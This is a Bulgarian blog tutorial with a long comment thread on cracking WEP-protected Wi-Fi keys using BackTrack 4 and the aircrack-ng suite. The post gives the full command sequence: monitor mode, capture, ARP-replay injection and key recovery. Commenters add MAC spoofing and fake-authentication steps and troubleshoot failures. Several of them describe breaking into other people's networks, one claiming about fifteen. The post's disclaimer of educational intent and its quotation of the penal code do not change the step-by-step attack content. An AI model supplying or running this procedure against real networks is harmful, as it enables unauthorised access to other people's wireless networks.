Разбиване на Wireless с WEP encoding
Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.
Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring;
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)
Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.
# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0
Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.
След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C
Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.
aircrack-ng wep-03.cap
Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Подобни публикации:
евалата пич .. мисля че много ще ми помогне ама само да ми кажеш какво е това wlan0 ?? твоя си интернет ли че нещо се обърках
Мисля, че преди да правиш това от урока трябва доста прочетеш, wlan0 е мрежовия интерфейс на моя wireless
С какъв wifi адаптер си, случвало ли ти се е да не можеш да вкараш адаптера в мониторинг мод? С Интелски контролер нямам никакви грижи, но с един dell с broadcom направо си изядох ушите
Ако ти е интересно това ще ти служи за ориентир:
root@stelko-laptop:~# iwpriv eth1
eth1 Available private ioctls :
set_leddc (8BE0) : set 1 int & get 0
set_vlanmode (8BE1) : set 1 int & get 0
set_pm (8BE2) : set 1 int & get 0
root@stelko-laptop:~# iwconfig eth1 mode monitoring
Error for wireless request "Set Mode" (8B06) :
SET failed on device eth1 ; Invalid argument.
root@stelko-laptop:~# iwpriv eth1
eth1 Available private ioctls :
set_leddc (8BE0) : set 1 int & get 0
set_vlanmode (8BE1) : set 1 int & get 0
set_pm (8BE2) : set 1 int & get 0
root@stelko-laptop:~# dpkg -l |grep b43
ii b43-fwcutter 1:012-1 Utility for extracting Broadcom 43xx firmwarе
Пробва ли първо да свалиш интерфейса и след това да му слагаш режим мониторинг
ifconfig eth1 down
iwconfig eth1 mode monitoring
#
Успех
Е, айде сега
Не сме чак такива ламери 
iwpriv показва че не можем да сетнем мод, и си мисля, че ще е нещо от драйвер или firmware. Просто се чудех дали ти се е случвало
Господин Петров спазвам всичко което сте правили и пак не става.Забелязах, че при вас при командата aireplay при вас там дето пише sent и ppc =0. Това на какво се дължи и как да го оправя.Обхвата спрямо airodump -ng wlan0 e 187.Мерси предварително.
Здравейте може ли малко помощ …
купих си лаптоп и си инсталирах на него VMware workstation 7. До тук добре. Свалих си от интернет сайта BackTrack4. Но нямам wi fi мрежа. Може би устройството не може да ми го засече. Някой ще ми каже ли как да си подкарам безжичната карта ?
@Hpc6820s
Брато като напишеш командата в black track airodump-ng wlan0 нищо ли не излиза.Има два вариянта -- първият е около теб няма wifi мрежи или ако има с антената на лаптопа не можеш да ги видиш. решението копуваш pci карта за лаптоп с възможност външна антена и съответно трябва да си купиш и антена.Вторият е да не си включил хардуерно wifi картата.Решение- аз също имам лаптоп и при мен се включва с копче над клавиятурата .Също си виш Биоса.
брато междо др. не се занимавай с глипости щото става много бавно ако рутера е далеч от теб
Аз всичко направих човека много добре си е обяснил ама май ние сме тъпи и наистина трябва да четем. На мен ми трагва търси събирам даже не 22000 а 120000 и накрая пак не може да намери паролата на рутера ми е черно, че е шибана a12eG56FR7
Имам нужда от помощ савирам дата пакетите (гот много късно тръгват(
interface shipset drivers i otdolu na dolniq red ni6to ne mi izliza
airmon-ng napisvam i ni6to…..
Ти си велик, човече!! Моите поздравления! Къде беше, когато преди месец трябваше да кисна три дена извън България на едно място единствено с лаптоп и около 5-6 wireless мрежи и всичките заключени..
Сега ще седна да попрочета нещо повече за wi-fi и ще пробвам да си хакна собствената мрежа за да видим какво ще се получи 
Господин Петров за моя лаптоп Acer-WLAN_Atheros_AR5B93 какви драйвери трябва да си изтегля за активация на wlan0 и ако може кодовете за активиране за blacktrack4 beta благодаря
Попитай в google.com какво ти трябва за твоя лаптоп, а относно backtrack 4 beta- не трябва да се въвеждат никакви кодове.
да ама ми иска чипсет дривер ето с това немога дасе справя иначе си работи с vmware-to истеглил сьм сумати linux драивери ама пак нещо не става сигорно някаде бьркьм при инстала на wlana. затова се обьрнах кьм вас за помощ, щесьм ви благодарен ако ми помогнете с подробности ако неви затруднява. ПОМОЩ
гледах видео-то мн перфектно обесняваш радвам се, дано и ас успеа да под карам влана че даго исползвам наи сетне.
При мен ситуацията е подобна, с усб адаптер Д-Линк още с първите редове системата не тръгва: # iwconfig wlan0 mode monitoring; Сега чакам да си получа Алфа Нетуорк 2 ватов адаптер безжичен с 17 дби антена и дано с него да заработи ако драйверите позволяват.
Перфектно видео и полезни уроци за прохождане. Поздравления на МП! Отличник!
Мартин Петров със същите команди може ли да стане и със backtrack 3 ? Благодаря
Здравей. Ако тези приложения ги има и там да , най- вероятно ги има
Здравейте.Искам да попитам преди да се изпълни aireplay-ng не трябва ли да има първоначално някаква data resived,защото ако е нула може да не се получи инжектирането,или нямя значение това??
и при тази команда # aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0 при мен ми дава грашка,казва ,че липсва моя MAC,
Някакви идей да имате????
Матри мерси много,,при мен всичко работи,,не точно с твоите команди,,но и тжои команди използвам :Д ..вече имам 3 успеха,,,,,с малко трафик за 5-10мин. се намира клуча :д Благодаря
zdravei Martine! 6temojete li da mi obqsnite za6to sled komandata airodump-ng-w wep c8 --bssid(kopiranata mreja) wlan0 ni dava airodump-ng w;nout fond blagodarq predvaritelno
zdravei Martine! 6te mojete li da mi obqsnite za6to sled komandata airodump-ng-w wep c8 --bssid(kopiranata mreja) wlan0 mi dava airodump-ng w;nout fond blagodarq predvaritelno
@Ivoo
ZDRAVEI BI LI MI OBQSNIL KAK GO NAPRAVI .BLAGODARQ
@stoqn
Ами мисля че е просто",бактрак на лайв СД"зареждаш и пишеш:
airmon-ng
,,i po to4no,ako nqkoi drug polzva rutera)
,ako ima6 sabrani paketi i IVs,stava za sekunda "KEY FOUND-bla bla bla,i vijda6 parolata)
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0 (smenqm si maccka)
airmon-ng start wlan0 (startira6 wifi-to)
airdump-ng wlan0 (izbira6 mreja s WEP za6tita,i kopira6 MACCA,i zapomnq6 imeto i)
airodump-ng -w wep -c (kanal) --bssid (paste macca) wlan0
(otvarq6 shell 2 i pi6e6 v nego)
aireplay-ng -1 0 -a (paste) -h 00:11:22:33:44:55 -e (imeto na mrejata) wlan0
aireplay-ng -3 -b (paste) -h 00:11:22:33:44:55 wlan0
(s tezi 2 komandi pravi6 fors na paketite,i nabludava6 "date packets" da se saberat za po sigurno okolo 200000,,,ako ima trafik stava barzo,,ako nqma,,6te si po4aka6
(otvarq6 shell 3 kato ti se saberat date paketite i puska6 AIRCRACK-a taka)
aircrack-ng wep-01.cap -----(i kasmet
Ами дано съм помогнал,,казах ти то4но как при мен работи ,,,Касмет,,и сподели после какво си направил.
@angel
zdravei i az imam su6tiq problem moqt laptop e acer a kartata mi e intel 3945 a/b/g i ne moga da q postavq v rejim monitor ako mojete pomognete ,blagodarq
нешто не става. май проблема е в backtrack. от замундата си дръпнах един който е boot for CD. успях да го тръгна докато компютъра е включен с няква програма обаче сега не ще да ми влезе в мониторинг мод, а като го bootна от диск тръгва.проблема е че от диска не мога да отворя втори терминал.имам чувството, че съм с друга версия. даите линк да си тръпна версия за виста. благодаря предварително.
нащо не е как трябва. сичко точно и ясно само че. като на data е 0 неще да събира packets. 20 000 ги събирах час и половина.
това, че няма data и packets какво ще тече, че мрежата не става за нищо или?
zdraveite! vuzmojno li e da stane s vgradenata mi karta koqto e intel 3945 a/b/g i kak da i instaliram draiveri v back rtack za da zaraboti ?
Здравейте
Прочетох мненията но ненамерих точно как се стартира backtrack4.
С лаптоп сам и незнам командата при в началото още при тръгването на backtrack. Ako може някои да ми помогне
molq kajete ispisva mi kogato napi6a startx
Connecttion (errno 111); unable to conect to x server
No such process (errno 3): Server error
Ta kakvo da pravq po natatak za da se zaredi programata backtrack4
"airodump-ng-w wep c8 --bssid(kopiranata mreja) wlan0" каде ти е интержала между airodump-ng и -w@stoqn
пишеш : startx и натискаш ENTER
@Ivoo
Браво Ivoo ,и аз по същия начин ги перкам,вече имам 15-тина ударени с новата карта на реалтек,обаче има едно ви-фи,което е на 85 процента на сигнала,всичко е точно до момента на инжекцията,на aireplay-ng -1 0 ……….. ми дава open sistem, aireplay-ng -3 ……….. и седи на 0 0 0 ,Дата има ,постоянно ползват вифи-то ,сигорно 20 пъти съм пускал блак трака да го разбивам и все до там,нито един дата пакет не инжектира, 2 рутера на същия доставчик без проблем ударих,но този направо ме съсипва.Даже и на теста на инжектирване aireplay-ng -9 -a (bssid) -h (moq MAC) ми дава 30 от 30 пакета,демек че се поддава 100 процента на инжекция, Някой да има идея на какво се дължи това,ще съм му много благодарен,Благодаря
вече е ясно какво става,в 3 часа преди да тръгна за работа оставих aireplay-ng да работи,и като се прибрах в 6 ч. вече имаше 1.500.000 data. и изкара паролата без проблеми
)
@Румен
ами сподели тогава какво става,,щото и аз имам същия проблем с 1 мрежа..като стартирам инжекцията и започва:
"edi si kvo "waiting 3 second"
"waitong 7 second"
waiting 15 second"waiting25 second"
и така само,,не става инжектора,,и мисля че това не се влияе с трафика на рутера,,ами не знам какво става,,Крайна сметка не става инжекцията..Ако ти е ясно какво става,,моля сподели Мерси
@Ivoo
Ами пробвах и с моя рутер,без да има закачен клиент за него и aireplay-ng -3 ….. седи на ( got 0 ask 0 send 0 ),демек няма инжекция,но в момента в който се закачих с телефона за него,тръгна с бясна скорост да инжектира,та извода ми е,че ако няма дата не става,и ако няма подключен клиент за рутера,няма да стане хватката,също така и при aireplay-ng -1 0 ….. ако не ти даде open system пак няма да стане.Забелязах при клиповете на Мартин че неговата дата още в началото е доста солидна,и доста здраво се покачва даже и без инжекцион.
Сега имам и друг проблен с друг рутер.Не ми дава open system,с което не ми позволява да изпращам дата пакети,но съм решил да пробвам на няколко пъти да пускам airodump с цел overwrite на cap file докато не се съберят 10 -- 15 хиляди дата пакети за кракване,само ме притеснява при повторно пускане на airаodump дали няма да се презастъпят старите данни и да започнат пак от нула.
ами това е засега,някакъв пич разправял,че можел да хакне паролата и без да има дата,ако някой разбере нещо по въпроса да драсне едно редче -.:))
@RSD
Ами да,,липсва ти наистена твоя МАК..пробваи така "# aireplay-ng -3 -b 00:23:CD:D7:84:FC -h (pi6e6 tvoq mack) wlan0
bih iskal da popitam uvajaemiq gospodin petrov s kakav wifi adapter e?
Хора никъде не виждам да обсъждате следния проблем. При събрани достатъчно пакети и команда:
aircrack-ng wep-01.cap
ми излиза съобщение
Please specify a dictionary (option -w).
и аиркрак спира.
Никъде не виждам някой да има този проблем.
Определено разбирам че иска речник. Чудя се обаче дори и да сваля от някъде речник едва ли в него ще има дума от сорта на КАРАЧЕРНАЕВ или подобни,
Някой,ако знае ,да каже какво правим когато мрежата е на 12 или 13 канал?
Здравейте. Моята карта е: 3945ABG [Golan]
@Хари
А ти сигурен ли си ,че се опитваш да кракнеш WEP мрежа,защото речник иска само на WPA мрежи,пробвай така за да няма грешки
airodump-ng wlan0 -- - encrypt wep
Мога само да кажа само едно голямо БРАВО 3 дена се мача и накрая всичко стана БРАВО
Ами би трябвало да е същото като на другите канали.Пишеш за 12 канал
airodump-ng -c 12 w wep -- - bssid (bssid) wlan0
Лично аз не съм попадал на мрежа с излъчване над 11 канал,но принципа трябва да е същия според мен
Здравейте,
при мен всичко е ок, но не мога да разкрия ключа. Когато стигна до последната стъпка ми казва, че не съществува в речникът. Аз ли греша, дайте малко помощ.
Значи проблема може да е следният,когато правите
airodump-ng -w wep -c (kanal) --bssid (paste macca) wlan0
за тази мрежа се създава фаил wep-o1.cap ,и трябва накрая да пишете
aircrack-ng wep-01.cap
ako пуснете втори път да сканира с друг bssid се създава фаил wep-02.cap,и се пише
aircrack-ng wep-02.cap ,
и така за всяка следваща мрежа,защото не всеки път става събирането на дата пакети.
Аз лично вместо wep създавам фаил с името на мрежата за да не се чудя накрая кои cap. фаил да краквам и по точно ако краквам мрежа с име belkin_wifi пиша
airodump-ng -w belkin_wifi -c (kanal) --bssid (paste macca) wlan0
и накрая
aircrack-ng belkin_wifi-01.cap